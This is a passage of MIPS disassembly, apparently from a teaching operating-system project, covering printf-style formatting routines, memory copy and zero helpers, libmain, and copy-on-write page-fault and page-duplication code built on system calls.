4004ac: 26730004 addiu s3,s3,4
4004b0: afa80010 sw t0,16(sp)
4004b4: afa70014 sw a3,20(sp)
4004b8: afa90018 sw t1,24(sp)
4004bc: afa0001c sw zero,28(sp)
4004c0: 27a40020 addiu a0,sp,32
4004c4: 24060002 li a2,2
4004c8: 0c10028a jal 400a28 <user_PrintNum>
4004cc: 00003821 move a3,zero
4004d0: 00408021 move s0,v0
4004d4: 00403021 move a2,v0
4004d8: 2c4203e9 sltiu v0,v0,1001
4004dc: 14400007 bnez v0,4004fc <user_lp_Print+0x23c>
4004e0: 02402021 move a0,s2
4004e4: 3c050040 lui a1,0x40
4004e8: 24a57000 addiu a1,a1,28672
4004ec: 02a0f809 jalr s5
4004f0: 2406001d li a2,29
4004f4: 1000ffff b 4004f4 <user_lp_Print+0x234>
4004f8: 00000000 nop
4004fc: 02a0f809 jalr s5
400500: 27a50020 addiu a1,sp,32
400504: 100000cd b 40083c <user_lp_Print+0x57c>
400508: 02509021 addu s2,s2,s0
40050c: 10800004 beqz a0,400520 <user_lp_Print+0x260>
400510: 00000000 nop
400514: 8e650000 lw a1,0(s3)
400518: 10000003 b 400528 <user_lp_Print+0x268>
40051c: 26730004 addiu s3,s3,4
400520: 8e650000 lw a1,0(s3)
400524: 26730004 addiu s3,s3,4
400528: 04a10003 bgez a1,400538 <user_lp_Print+0x278>
40052c: 00001021 move v0,zero
400530: 00052823 negu a1,a1
400534: 24020001 li v0,1
400538: afa80010 sw t0,16(sp)
40053c: afa70014 sw a3,20(sp)
400540: afa90018 sw t1,24(sp)
400544: afa0001c sw zero,28(sp)
400548: 27a40020 addiu a0,sp,32
40054c: 2406000a li a2,10
400550: 0c10028a jal 400a28 <user_PrintNum>
400554: 00403821 move a3,v0
400558: 00408021 move s0,v0
40055c: 00403021 move a2,v0
400560: 2c4203e9 sltiu v0,v0,1001
400564: 14400007 bnez v0,400584 <user_lp_Print+0x2c4>
400568: 02402021 move a0,s2
40056c: 3c050040 lui a1,0x40
400570: 24a57000 addiu a1,a1,28672
400574: 02a0f809 jalr s5
400578: 2406001d li a2,29
40057c: 1000ffff b 40057c <user_lp_Print+0x2bc>
400580: 00000000 nop
400584: 02a0f809 jalr s5
400588: 27a50020 addiu a1,sp,32
40058c: 100000ab b 40083c <user_lp_Print+0x57c>
400590: 02509021 addu s2,s2,s0
400594: 10800004 beqz a0,4005a8 <user_lp_Print+0x2e8>
400598: 00000000 nop
40059c: 8e650000 lw a1,0(s3)
4005a0: 10000003 b 4005b0 <user_lp_Print+0x2f0>
4005a4: 26730004 addiu s3,s3,4
4005a8: 8e650000 lw a1,0(s3)
4005ac: 26730004 addiu s3,s3,4
4005b0: afa80010 sw t0,16(sp)
4005b4: afa70014 sw a3,20(sp)
4005b8: afa90018 sw t1,24(sp)
4005bc: afa0001c sw zero,28(sp)
4005c0: 27a40020 addiu a0,sp,32
4005c4: 24060008 li a2,8
4005c8: 0c10028a jal 400a28 <user_PrintNum>
4005cc: 00003821 move a3,zero
4005d0: 00408021 move s0,v0
4005d4: 00403021 move a2,v0
4005d8: 2c4203e9 sltiu v0,v0,1001
4005dc: 14400007 bnez v0,4005fc <user_lp_Print+0x33c>
4005e0: 02402021 move a0,s2
4005e4: 3c050040 lui a1,0x40
4005e8: 24a57000 addiu a1,a1,28672
4005ec: 02a0f809 jalr s5
4005f0: 2406001d li a2,29
4005f4: 1000ffff b 4005f4 <user_lp_Print+0x334>
4005f8: 00000000 nop
4005fc: 02a0f809 jalr s5
400600: 27a50020 addiu a1,sp,32
400604: 1000008d b 40083c <user_lp_Print+0x57c>
400608: 02509021 addu s2,s2,s0
40060c: 10800004 beqz a0,400620 <user_lp_Print+0x360>
400610: 00000000 nop
400614: 8e650000 lw a1,0(s3)
400618: 10000003 b 400628 <user_lp_Print+0x368>
40061c: 26730004 addiu s3,s3,4
400620: 8e650000 lw a1,0(s3)
400624: 26730004 addiu s3,s3,4
400628: afa80010 sw t0,16(sp)
40062c: afa70014 sw a3,20(sp)
400630: afa90018 sw t1,24(sp)
400634: afa0001c sw zero,28(sp)
400638: 27a40020 addiu a0,sp,32
40063c: 2406000a li a2,10
400640: 0c10028a jal 400a28 <user_PrintNum>
400644: 00003821 move a3,zero
400648: 00408021 move s0,v0
40064c: 00403021 move a2,v0
400650: 2c4203e9 sltiu v0,v0,1001
400654: 14400007 bnez v0,400674 <user_lp_Print+0x3b4>
400658: 02402021 move a0,s2
40065c: 3c050040 lui a1,0x40
400660: 24a57000 addiu a1,a1,28672
400664: 02a0f809 jalr s5
400668: 2406001d li a2,29
40066c: 1000ffff b 40066c <user_lp_Print+0x3ac>
400670: 00000000 nop
400674: 02a0f809 jalr s5
400678: 27a50020 addiu a1,sp,32
40067c: 1000006f b 40083c <user_lp_Print+0x57c>
400680: 02509021 addu s2,s2,s0
400684: 10800004 beqz a0,400698 <user_lp_Print+0x3d8>
400688: 00000000 nop
40068c: 8e650000 lw a1,0(s3)
400690: 10000003 b 4006a0 <user_lp_Print+0x3e0>
400694: 26730004 addiu s3,s3,4
400698: 8e650000 lw a1,0(s3)
40069c: 26730004 addiu s3,s3,4
4006a0: afa80010 sw t0,16(sp)
4006a4: afa70014 sw a3,20(sp)
4006a8: afa90018 sw t1,24(sp)
4006ac: afa0001c sw zero,28(sp)
4006b0: 27a40020 addiu a0,sp,32
4006b4: 24060010 li a2,16
4006b8: 0c10028a jal 400a28 <user_PrintNum>
4006bc: 00003821 move a3,zero
4006c0: 00408021 move s0,v0
4006c4: 00403021 move a2,v0
4006c8: 2c4203e9 sltiu v0,v0,1001
4006cc: 14400007 bnez v0,4006ec <user_lp_Print+0x42c>
4006d0: 02402021 move a0,s2
4006d4: 3c050040 lui a1,0x40
4006d8: 24a57000 addiu a1,a1,28672
4006dc: 02a0f809 jalr s5
4006e0: 2406001d li a2,29
4006e4: 1000ffff b 4006e4 <user_lp_Print+0x424>
4006e8: 00000000 nop
4006ec: 02a0f809 jalr s5
4006f0: 27a50020 addiu a1,sp,32
4006f4: 10000051 b 40083c <user_lp_Print+0x57c>
4006f8: 02509021 addu s2,s2,s0
4006fc: 10800004 beqz a0,400710 <user_lp_Print+0x450>
400700: 00000000 nop
400704: 8e650000 lw a1,0(s3)
400708: 10000003 b 400718 <user_lp_Print+0x458>
40070c: 26730004 addiu s3,s3,4
400710: 8e650000 lw a1,0(s3)
400714: 26730004 addiu s3,s3,4
400718: afa80010 sw t0,16(sp)
40071c: afa70014 sw a3,20(sp)
400720: afa90018 sw t1,24(sp)
400724: 24020001 li v0,1
400728: afa2001c sw v0,28(sp)
40072c: 27a40020 addiu a0,sp,32
400730: 24060010 li a2,16
400734: 0c10028a jal 400a28 <user_PrintNum>
400738: 00003821 move a3,zero
40073c: 00408021 move s0,v0
400740: 00403021 move a2,v0
400744: 2c4203e9 sltiu v0,v0,1001
400748: 14400007 bnez v0,400768 <user_lp_Print+0x4a8>
40074c: 02402021 move a0,s2
400750: 3c050040 lui a1,0x40
400754: 24a57000 addiu a1,a1,28672
400758: 02a0f809 jalr s5
40075c: 2406001d li a2,29
400760: 1000ffff b 400760 <user_lp_Print+0x4a0>
400764: 00000000 nop
400768: 02a0f809 jalr s5
40076c: 27a50020 addiu a1,sp,32
400770: 10000032 b 40083c <user_lp_Print+0x57c>
400774: 02509021 addu s2,s2,s0
400778: 26740004 addiu s4,s3,4
40077c: 27a40020 addiu a0,sp,32
400780: 82650003 lb a1,3(s3)
400784: 0c100223 jal 40088c <user_PrintChar>
400788: 01003021 move a2,t0
40078c: 00408021 move s0,v0
400790: 00403021 move a2,v0
400794: 2c4203e9 sltiu v0,v0,1001
400798: 14400007 bnez v0,4007b8 <user_lp_Print+0x4f8>
40079c: 02402021 move a0,s2
4007a0: 3c050040 lui a1,0x40
4007a4: 24a57000 addiu a1,a1,28672
4007a8: 02a0f809 jalr s5
4007ac: 2406001d li a2,29
4007b0: 1000ffff b 4007b0 <user_lp_Print+0x4f0>
4007b4: 00000000 nop
4007b8: 02a0f809 jalr s5
4007bc: 27a50020 addiu a1,sp,32
4007c0: 02509021 addu s2,s2,s0
4007c4: 1000001d b 40083c <user_lp_Print+0x57c>
4007c8: 02809821 move s3,s4
4007cc: 26740004 addiu s4,s3,4
4007d0: 27a40020 addiu a0,sp,32
4007d4: 8e650000 lw a1,0(s3)
4007d8: 0c100242 jal 400908 <user_PrintString>
4007dc: 01003021 move a2,t0
4007e0: 00408021 move s0,v0
4007e4: 00403021 move a2,v0
4007e8: 2c4203e9 sltiu v0,v0,1001
4007ec: 14400007 bnez v0,40080c <user_lp_Print+0x54c>
4007f0: 02402021 move a0,s2
4007f4: 3c050040 lui a1,0x40
4007f8: 24a57000 addiu a1,a1,28672
4007fc: 02a0f809 jalr s5
400800: 2406001d li a2,29
400804: 1000ffff b 400804 <user_lp_Print+0x544>
400808: 00000000 nop
40080c: 02a0f809 jalr s5
400810: 27a50020 addiu a1,sp,32
400814: 02509021 addu s2,s2,s0
400818: 10000008 b 40083c <user_lp_Print+0x57c>
40081c: 02809821 move s3,s4
400820: 10000006 b 40083c <user_lp_Print+0x57c>
400824: 2631ffff addiu s1,s1,-1
400828: 02402021 move a0,s2
40082c: 02202821 move a1,s1
400830: 02a0f809 jalr s5
400834: 24060001 li a2,1
400838: 26520001 addiu s2,s2,1
40083c: 1000feac b 4002f0 <user_lp_Print+0x30>
400840: 26250001 addiu a1,s1,1
400844: 02402021 move a0,s2
400848: 3c050040 lui a1,0x40
40084c: 24a57020 addiu a1,a1,28704
400850: 02a0f809 jalr s5
400854: 24060001 li a2,1
400858: 8fbf0420 lw ra,1056(sp)
40085c: 8fb5041c lw s5,1052(sp)
400860: 8fb40418 lw s4,1048(sp)
400864: 8fb30414 lw s3,1044(sp)
400868: 8fb20410 lw s2,1040(sp)
40086c: 8fb1040c lw s1,1036(sp)
400870: 8fb00408 lw s0,1032(sp)
400874: 03e00008 jr ra
400878: 27bd0428 addiu sp,sp,1064
40087c: 1462fea2 bne v1,v0,400308 <user_lp_Print+0x48>
400880: 24030025 li v1,37
400884: 1000feaa b 400330 <user_lp_Print+0x70>
400888: 00a08021 move s0,a1
0040088c <user_PrintChar>:
40088c: 00052e00 sll a1,a1,0x18
400890: 1cc00002 bgtz a2,40089c <user_PrintChar+0x10>
400894: 00052e03 sra a1,a1,0x18
400898: 24060001 li a2,1
40089c: 10e00014 beqz a3,4008f0 <user_PrintChar+0x64>
4008a0: 28c20002 slti v0,a2,2
4008a4: 14400016 bnez v0,400900 <user_PrintChar+0x74>
4008a8: a0850000 sb a1,0(a0)
4008ac: 24030001 li v1,1
4008b0: 24050020 li a1,32
4008b4: 00831021 addu v0,a0,v1
4008b8: 24630001 addiu v1,v1,1
4008bc: 10c30010 beq a2,v1,400900 <user_PrintChar+0x74>
4008c0: a0450000 sb a1,0(v0)
4008c4: 1000fffc b 4008b8 <user_PrintChar+0x2c>
4008c8: 00831021 addu v0,a0,v1
4008cc: 00001821 move v1,zero
4008d0: 24080020 li t0,32
4008d4: 00641021 addu v0,v1,a0
4008d8: 24630001 addiu v1,v1,1
4008dc: 1467fffd bne v1,a3,4008d4 <user_PrintChar+0x48>
4008e0: a0480000 sb t0,0(v0)
4008e4: 00c41021 addu v0,a2,a0
4008e8: 10000005 b 400900 <user_PrintChar+0x74>
4008ec: a045ffff sb a1,-1(v0)
4008f0: 24c7ffff addiu a3,a2,-1
4008f4: 1ce0fff5 bgtz a3,4008cc <user_PrintChar+0x40>
4008f8: 00c41021 addu v0,a2,a0
4008fc: a045ffff sb a1,-1(v0)
400900: 03e00008 jr ra
400904: 00c01021 move v0,a2
00400908 <user_PrintString>:
400908: 80a20000 lb v0,0(a1)
40090c: 00000000 nop
400910: 14400003 bnez v0,400920 <user_PrintString+0x18>
400914: 24a30001 addiu v1,a1,1
400918: 10000007 b 400938 <user_PrintString+0x30>
40091c: 00004021 move t0,zero
400920: 00004021 move t0,zero
400924: 25080001 addiu t0,t0,1
400928: 80620000 lb v0,0(v1)
40092c: 00000000 nop
400930: 1440fffc bnez v0,400924 <user_PrintString+0x1c>
400934: 24630001 addiu v1,v1,1
400938: 00c8102a slt v0,a2,t0
40093c: 10400002 beqz v0,400948 <user_PrintString+0x40>
400940: 00000000 nop
400944: 01003021 move a2,t0
400948: 14e00031 bnez a3,400a10 <user_PrintString+0x108>
40094c: 00c83823 subu a3,a2,t0
400950: 1000002b b 400a00 <user_PrintString+0xf8>
400954: 00000000 nop
400958: 00003821 move a3,zero
40095c: 00871021 addu v0,a0,a3
400960: 00a71821 addu v1,a1,a3
400964: 90630000 lbu v1,0(v1)
400968: 24e70001 addiu a3,a3,1
40096c: 1507fffb bne t0,a3,40095c <user_PrintString+0x54>
400970: a0430000 sb v1,0(v0)
400974: 0106102a slt v0,t0,a2
400978: 10400029 beqz v0,400a20 <user_PrintString+0x118>
40097c: 00001821 move v1,zero
400980: 00881021 addu v0,a0,t0
400984: 24050020 li a1,32
400988: 00c82023 subu a0,a2,t0
40098c: a0450000 sb a1,0(v0)
400990: 24630001 addiu v1,v1,1
400994: 10640022 beq v1,a0,400a20 <user_PrintString+0x118>
400998: 24420001 addiu v0,v0,1
40099c: 1000fffc b 400990 <user_PrintString+0x88>
4009a0: a0450000 sb a1,0(v0)
4009a4: 00001821 move v1,zero
4009a8: 24090020 li t1,32
4009ac: 00831021 addu v0,a0,v1
4009b0: 24630001 addiu v1,v1,1
4009b4: 1467fffd bne v1,a3,4009ac <user_PrintString+0xa4>
4009b8: a0490000 sb t1,0(v0)
4009bc: 00e6102a slt v0,a3,a2
4009c0: 10400017 beqz v0,400a20 <user_PrintString+0x118>
4009c4: 00872021 addu a0,a0,a3
4009c8: 00e61023 subu v0,a3,a2
4009cc: 01021021 addu v0,t0,v0
4009d0: 00a21821 addu v1,a1,v0
4009d4: 00002821 move a1,zero
4009d8: 00c73823 subu a3,a2,a3
4009dc: 90620000 lbu v0,0(v1)
4009e0: 00000000 nop
4009e4: a0820000 sb v0,0(a0)
4009e8: 24a50001 addiu a1,a1,1
4009ec: 24630001 addiu v1,v1,1
4009f0: 10a7000b beq a1,a3,400a20 <user_PrintString+0x118>
4009f4: 24840001 addiu a0,a0,1
4009f8: 1000fff8 b 4009dc <user_PrintString+0xd4>
4009fc: 00000000 nop
400a00: 1ce0ffe8 bgtz a3,4009a4 <user_PrintString+0x9c>
400a04: 00e6102a slt v0,a3,a2
400a08: 1000ffed b 4009c0 <user_PrintString+0xb8>
400a0c: 00000000 nop
400a10: 1d00ffd1 bgtz t0,400958 <user_PrintString+0x50>
400a14: 0106102a slt v0,t0,a2
400a18: 1000ffd7 b 400978 <user_PrintString+0x70>
400a1c: 00000000 nop
400a20: 03e00008 jr ra
400a24: 00c01021 move v0,a2
00400a28 <user_PrintNum>:
400a28: 8fa90010 lw t1,16(sp)
400a2c: 8fac0014 lw t4,20(sp)
400a30: 8fab001c lw t3,28(sp)
400a34: 83aa001b lb t2,27(sp)
400a38: 00804021 move t0,a0
400a3c: 14c00002 bnez a2,400a48 <user_PrintNum+0x20>
400a40: 00a6001b divu zero,a1,a2
400a44: 0007000d break 0x7
400a48: 00001810 mfhi v1
400a4c: 2862000a slti v0,v1,10
400a50: 10400004 beqz v0,400a64 <user_PrintNum+0x3c>
400a54: 24620030 addiu v0,v1,48
400a58: a1020000 sb v0,0(t0)
400a5c: 1000000c b 400a90 <user_PrintNum+0x68>
400a60: 25080001 addiu t0,t0,1
400a64: 11600005 beqz t3,400a7c <user_PrintNum+0x54>
400a68: 24620057 addiu v0,v1,87
400a6c: 24620037 addiu v0,v1,55
400a70: a1020000 sb v0,0(t0)
400a74: 10000003 b 400a84 <user_PrintNum+0x5c>
400a78: 25080001 addiu t0,t0,1
400a7c: a1020000 sb v0,0(t0)
400a80: 25080001 addiu t0,t0,1
400a84: 14c00002 bnez a2,400a90 <user_PrintNum+0x68>
400a88: 00a6001b divu zero,a1,a2
400a8c: 0007000d break 0x7
400a90: 00002812 mflo a1
400a94: 14a0ffe9 bnez a1,400a3c <user_PrintNum+0x14>
400a98: 00000000 nop
400a9c: 10e00005 beqz a3,400ab4 <user_PrintNum+0x8c>
400aa0: 01043023 subu a2,t0,a0
400aa4: 2402002d li v0,45
400aa8: a1020000 sb v0,0(t0)
400aac: 25080001 addiu t0,t0,1
400ab0: 01043023 subu a2,t0,a0
400ab4: 0126102a slt v0,t1,a2
400ab8: 10400002 beqz v0,400ac4 <user_PrintNum+0x9c>
400abc: 00000000 nop
400ac0: 00c04821 move t1,a2
400ac4: 11800002 beqz t4,400ad0 <user_PrintNum+0xa8>
400ac8: 00000000 nop
400acc: 240a0020 li t2,32
400ad0: 10e00033 beqz a3,400ba0 <user_PrintNum+0x178>
400ad4: 00c9102a slt v0,a2,t1
400ad8: 15800031 bnez t4,400ba0 <user_PrintNum+0x178>
400adc: 00000000 nop
400ae0: 24020030 li v0,48
400ae4: 1542002e bne t2,v0,400ba0 <user_PrintNum+0x178>
400ae8: 00c9102a slt v0,a2,t1
400aec: 24c6ffff addiu a2,a2,-1
400af0: 2528ffff addiu t0,t1,-1
400af4: 00c8102a slt v0,a2,t0
400af8: 10400008 beqz v0,400b1c <user_PrintNum+0xf4>
400afc: 01061023 subu v0,t0,a2
400b00: 00861821 addu v1,a0,a2
400b04: 00002821 move a1,zero
400b08: 24070030 li a3,48
400b0c: a0670000 sb a3,0(v1)
400b10: 24a50001 addiu a1,a1,1
400b14: 14a2fffd bne a1,v0,400b0c <user_PrintNum+0xe4>
400b18: 24630001 addiu v1,v1,1
400b1c: 00891821 addu v1,a0,t1
400b20: 2402002d li v0,45
400b24: 1000000d b 400b5c <user_PrintNum+0x134>
400b28: a062ffff sb v0,-1(v1)
400b2c: a0aa0000 sb t2,0(a1)
400b30: 24630001 addiu v1,v1,1
400b34: 01261023 subu v0,t1,a2
400b38: 1462fffc bne v1,v0,400b2c <user_PrintNum+0x104>
400b3c: 24a50001 addiu a1,a1,1
400b40: 11800006 beqz t4,400b5c <user_PrintNum+0x134>
400b44: 00000000 nop
400b48: 24c6ffff addiu a2,a2,-1
400b4c: 1cc00005 bgtz a2,400b64 <user_PrintNum+0x13c>
400b50: 00003821 move a3,zero
400b54: 03e00008 jr ra
400b58: 01201021 move v0,t1
400b5c: 1000fffb b 400b4c <user_PrintNum+0x124>
400b60: 2526ffff addiu a2,t1,-1
400b64: 00802821 move a1,a0
400b68: 00862021 addu a0,a0,a2
400b6c: 80a20000 lb v0,0(a1)
400b70: 90830000 lbu v1,0(a0)
400b74: 00000000 nop
400b78: a0a30000 sb v1,0(a1)
400b7c: a0820000 sb v0,0(a0)
400b80: 24e70001 addiu a3,a3,1
400b84: 24c6ffff addiu a2,a2,-1
400b88: 24a50001 addiu a1,a1,1
400b8c: 00e6102a slt v0,a3,a2
400b90: 10400008 beqz v0,400bb4 <user_PrintNum+0x18c>
400b94: 2484ffff addiu a0,a0,-1
400b98: 1000fff4 b 400b6c <user_PrintNum+0x144>
400b9c: 00000000 nop
400ba0: 1040ffe7 beqz v0,400b40 <user_PrintNum+0x118>
400ba4: 00000000 nop
400ba8: 00862821 addu a1,a0,a2
400bac: 1000ffdf b 400b2c <user_PrintNum+0x104>
400bb0: 00001821 move v1,zero
400bb4: 01201021 move v0,t1
400bb8: 03e00008 jr ra
400bbc: 00000000 nop
00400bc0 <exit>:
400bc0: 27bdffe8 addiu sp,sp,-24
400bc4: afbf0010 sw ra,16(sp)
400bc8: 0c100554 jal 401550 <syscall_env_destroy>
400bcc: 00002021 move a0,zero
400bd0: 8fbf0010 lw ra,16(sp)
400bd4: 00000000 nop
400bd8: 03e00008 jr ra
400bdc: 27bd0018 addiu sp,sp,24
00400be0 <libmain>:
400be0: 27bdffe0 addiu sp,sp,-32
400be4: afbf001c sw ra,28(sp)
400be8: afb20018 sw s2,24(sp)
400bec: afb10014 sw s1,20(sp)
400bf0: afb00010 sw s0,16(sp)
400bf4: 00808821 move s1,a0
400bf8: 00a09021 move s2,a1
400bfc: 3c100041 lui s0,0x41
400c00: 0c10053a jal 4014e8 <syscall_getenvid>
400c04: ae008004 sw zero,-32764(s0)
400c08: 304203ff andi v0,v0,0x3ff
400c0c: 00022080 sll a0,v0,0x2
400c10: 00021940 sll v1,v0,0x5
400c14: 00641823 subu v1,v1,a0
400c18: 00621821 addu v1,v1,v0
400c1c: 000318c0 sll v1,v1,0x3
400c20: 3c020040 lui v0,0x40
400c24: 8c426000 lw v0,24576(v0)
400c28: 00000000 nop
400c2c: 00621821 addu v1,v1,v0
400c30: ae038004 sw v1,-32764(s0)
400c34: 02202021 move a0,s1
400c38: 0c100038 jal 4000e0 <umain>
400c3c: 02402821 move a1,s2
400c40: 0c1002f0 jal 400bc0 <exit>
400c44: 00000000 nop
400c48: 8fbf001c lw ra,28(sp)
400c4c: 8fb20018 lw s2,24(sp)
400c50: 8fb10014 lw s1,20(sp)
400c54: 8fb00010 lw s0,16(sp)
400c58: 03e00008 jr ra
400c5c: 27bd0020 addiu sp,sp,32
00400c60 <uget_sp>:
400c60: 27bdffe8 addiu sp,sp,-24
400c64: afbf0010 sw ra,16(sp)
400c68: 0c100034 jal 4000d0 <get_sp>
400c6c: 00000000 nop
400c70: 2403f000 li v1,-4096
400c74: 00431024 and v0,v0,v1
400c78: 8fbf0010 lw ra,16(sp)
400c7c: 00000000 nop
400c80: 03e00008 jr ra
400c84: 27bd0018 addiu sp,sp,24
00400c88 <user_bcopy>:
400c88: 30820003 andi v0,a0,0x3
400c8c: 14400004 bnez v0,400ca0 <user_bcopy+0x18>
400c90: 00c53021 addu a2,a2,a1
400c94: 30a20003 andi v0,a1,0x3
400c98: 10400018 beqz v0,400cfc <user_bcopy+0x74>
400c9c: 24a20003 addiu v0,a1,3
400ca0: 00a6102b sltu v0,a1,a2
400ca4: 1440000d bnez v0,400cdc <user_bcopy+0x54>
400ca8: 00a01821 move v1,a1
400cac: 03e00008 jr ra
400cb0: 00000000 nop
400cb4: 8c820000 lw v0,0(a0)
400cb8: 00000000 nop
400cbc: aca20000 sw v0,0(a1)
400cc0: 24a50004 addiu a1,a1,4
400cc4: 24630007 addiu v1,v1,7
400cc8: 0066182b sltu v1,v1,a2
400ccc: 1060fff4 beqz v1,400ca0 <user_bcopy+0x18>
400cd0: 24840004 addiu a0,a0,4
400cd4: 1000fff7 b 400cb4 <user_bcopy+0x2c>
400cd8: 00a01821 move v1,a1
400cdc: 90820000 lbu v0,0(a0)
400ce0: 00000000 nop
400ce4: a0620000 sb v0,0(v1)
400ce8: 24630001 addiu v1,v1,1
400cec: 1066ffef beq v1,a2,400cac <user_bcopy+0x24>
400cf0: 24840001 addiu a0,a0,1
400cf4: 1000fff9 b 400cdc <user_bcopy+0x54>
400cf8: 00000000 nop
400cfc: 0046102b sltu v0,v0,a2
400d00: 1440ffec bnez v0,400cb4 <user_bcopy+0x2c>
400d04: 00a01821 move v1,a1
400d08: 1000ffe6 b 400ca4 <user_bcopy+0x1c>
400d0c: 00a6102b sltu v0,a1,a2
00400d10 <user_bzero>:
400d10: 24a2ffff addiu v0,a1,-1
400d14: 04400007 bltz v0,400d34 <user_bzero+0x24>
400d18: 00801821 move v1,a0
400d1c: 00821021 addu v0,a0,v0
400d20: 24420001 addiu v0,v0,1
400d24: a0600000 sb zero,0(v1)
400d28: 24630001 addiu v1,v1,1
400d2c: 1462fffd bne v1,v0,400d24 <user_bzero+0x14>
400d30: 00000000 nop
400d34: 03e00008 jr ra
400d38: 00000000 nop
00400d3c <pgfault>:
400d3c: 27bdffd8 addiu sp,sp,-40
400d40: afbf0020 sw ra,32(sp)
400d44: afb1001c sw s1,28(sp)
400d48: afb00018 sw s0,24(sp)
400d4c: 00041302 srl v0,a0,0xc
400d50: 3c030040 lui v1,0x40
400d54: 8c636008 lw v1,24584(v1)
400d58: 00021080 sll v0,v0,0x2
400d5c: 00431021 addu v0,v0,v1
400d60: 8c420000 lw v0,0(v0)
400d64: 00000000 nop
400d68: 38420001 xori v0,v0,0x1
400d6c: 30420001 andi v0,v0,0x1
400d70: 10400007 beqz v0,400d90 <pgfault+0x54>
400d74: 2402f000 li v0,-4096
400d78: 3c040040 lui a0,0x40
400d7c: 2484726c addiu a0,a0,29292
400d80: 2405005e li a1,94
400d84: 3c060040 lui a2,0x40
400d88: 0c100096 jal 400258 <_user_panic>
400d8c: 24c67274 addiu a2,a2,29300
400d90: 00828824 and s1,a0,v0
400d94: 00002021 move a0,zero
400d98: 3c057f3f lui a1,0x7f3f
400d9c: 34a5e000 ori a1,a1,0xe000
400da0: 0c100570 jal 4015c0 <syscall_mem_alloc>
400da4: 24060600 li a2,1536
400da8: 04410007 bgez v0,400dc8 <pgfault+0x8c>
400dac: 02202021 move a0,s1
400db0: 3c040040 lui a0,0x40
400db4: 2484726c addiu a0,a0,29292
400db8: 24050066 li a1,102
400dbc: 3c060040 lui a2,0x40
400dc0: 0c100096 jal 400258 <_user_panic>
400dc4: 24c672a0 addiu a2,a2,29344
400dc8: 3c107f3f lui s0,0x7f3f
400dcc: 3605e000 ori a1,s0,0xe000
400dd0: 0c100322 jal 400c88 <user_bcopy>
400dd4: 24061000 li a2,4096
400dd8: 24020600 li v0,1536
400ddc: afa20010 sw v0,16(sp)
400de0: 00002021 move a0,zero
400de4: 3605e000 ori a1,s0,0xe000
400de8: 00003021 move a2,zero
400dec: 0c10057f jal 4015fc <syscall_mem_map>
400df0: 02203821 move a3,s1
400df4: 04410007 bgez v0,400e14 <pgfault+0xd8>
400df8: 00002021 move a0,zero
400dfc: 3c040040 lui a0,0x40
400e00: 2484726c addiu a0,a0,29292
400e04: 2405006e li a1,110
400e08: 3c060040 lui a2,0x40
400e0c: 0c100096 jal 400258 <_user_panic>
400e10: 24c672c8 addiu a2,a2,29384
400e14: 3c057f3f lui a1,0x7f3f
400e18: 0c100591 jal 401644 <syscall_mem_unmap>
400e1c: 34a5e000 ori a1,a1,0xe000
400e20: 04410006 bgez v0,400e3c <pgfault+0x100>
400e24: 3c040040 lui a0,0x40
400e28: 2484726c addiu a0,a0,29292
400e2c: 24050073 li a1,115
400e30: 3c060040 lui a2,0x40
400e34: 0c100096 jal 400258 <_user_panic>
400e38: 24c672ec addiu a2,a2,29420
400e3c: 8fbf0020 lw ra,32(sp)
400e40: 8fb1001c lw s1,28(sp)
400e44: 8fb00018 lw s0,24(sp)
400e48: 03e00008 jr ra
400e4c: 27bd0028 addiu sp,sp,40
00400e50 <duppage>:
400e50: 27bdffd8 addiu sp,sp,-40
400e54: afbf0020 sw ra,32(sp)
400e58: afb1001c sw s1,28(sp)
400e5c: afb00018 sw s0,24(sp)
400e60: 00803021 move a2,a0
400e64: 00058300 sll s0,a1,0xc
400e68: 3c020040 lui v0,0x40
400e6c: 8c426008 lw v0,24584(v0)
400e70: 00052880 sll a1,a1,0x2
400e74: 00a22821 addu a1,a1,v0
400e78: 8ca50000 lw a1,0(a1)
400e7c: 00000000 nop
400e80: 30a20400 andi v0,a1,0x400
400e84: 1440000d bnez v0,400ebc <duppage+0x6c>
400e88: 30a30fff andi v1,a1,0xfff
400e8c: afa30010 sw v1,16(sp)
400e90: 00002021 move a0,zero
400e94: 02002821 move a1,s0
400e98: 0c10057f jal 4015fc <syscall_mem_map>
400e9c: 02003821 move a3,s0
400ea0: 1040003c beqz v0,400f94 <duppage+0x144>
400ea4: 3c040040 lui a0,0x40
400ea8: 2484726c addiu a0,a0,29292
400eac: 24050097 li a1,151
400eb0: 3c060040 lui a2,0x40
400eb4: 0c100096 jal 400258 <_user_panic>
400eb8: 24c67314 addiu a2,a2,29460
400ebc: 30620004 andi v0,v1,0x4
400ec0: 1040000d beqz v0,400ef8 <duppage+0xa8>
400ec4: 30a20001 andi v0,a1,0x1
400ec8: afa30010 sw v1,16(sp)
400ecc: 00002021 move a0,zero
400ed0: 02002821 move a1,s0
400ed4: 0c10057f jal 4015fc <syscall_mem_map>
400ed8: 02003821 move a3,s0
400edc: 1040002d beqz v0,400f94 <duppage+0x144>
400ee0: 3c040040 lui a0,0x40
400ee4: 2484726c addiu a0,a0,29292
400ee8: 2405009c li a1,156
400eec: 3c060040 lui a2,0x40
400ef0: 0c100096 jal 400258 <_user_panic>
400ef4: 24c67334 addiu a2,a2,29492
400ef8: 1040000d beqz v0,400f30 <duppage+0xe0>
400efc: 34710001 ori s1,v1,0x1
400f00: afa30010 sw v1,16(sp)
400f04: 00002021 move a0,zero
400f08: 02002821 move a1,s0
400f0c: 0c10057f jal 4015fc <syscall_mem_map>
400f10: 02003821 move a3,s0
400f14: 1040001f beqz v0,400f94 <duppage+0x144>
400f18: 3c040040 lui a0,0x40
400f1c: 2484726c addiu a0,a0,29292
400f20: 240500a1 li a1,161
400f24: 3c060040 lui a2,0x40
400f28: 0c100096 jal 400258 <_user_panic>
400f2c: 24c67350 addiu a2,a2,29520
400f30: afb10010 sw s1,16(sp)
400f34: 00002021 move a0,zero
400f38: 02002821 move a1,s0
400f3c: 0c10057f jal 4015fc <syscall_mem_map>
400f40: 02003821 move a3,s0
400f44: 10400007 beqz v0,400f64 <duppage+0x114>
400f48: 00002021 move a0,zero
400f4c: 3c040040 lui a0,0x40
400f50: 2484726c addiu a0,a0,29292
400f54: 240500aa li a1,170
400f58: 3c060040 lui a2,0x40
400f5c: 0c100096 jal 400258 <_user_panic>
400f60: 24c67384 addiu a2,a2,29572
400f64: afb10010 sw s1,16(sp)
400f68: 02002821 move a1,s0
400f6c: 00003021 move a2,zero
400f70: 0c10057f jal 4015fc <syscall_mem_map>
400f74: 02003821 move a3,s0
400f78: 10400006 beqz v0,400f94 <duppage+0x144>
400f7c: 3c040040 lui a0,0x40
400f80: 2484726c addiu a0,a0,29292
400f84: 240500ad li a1,173
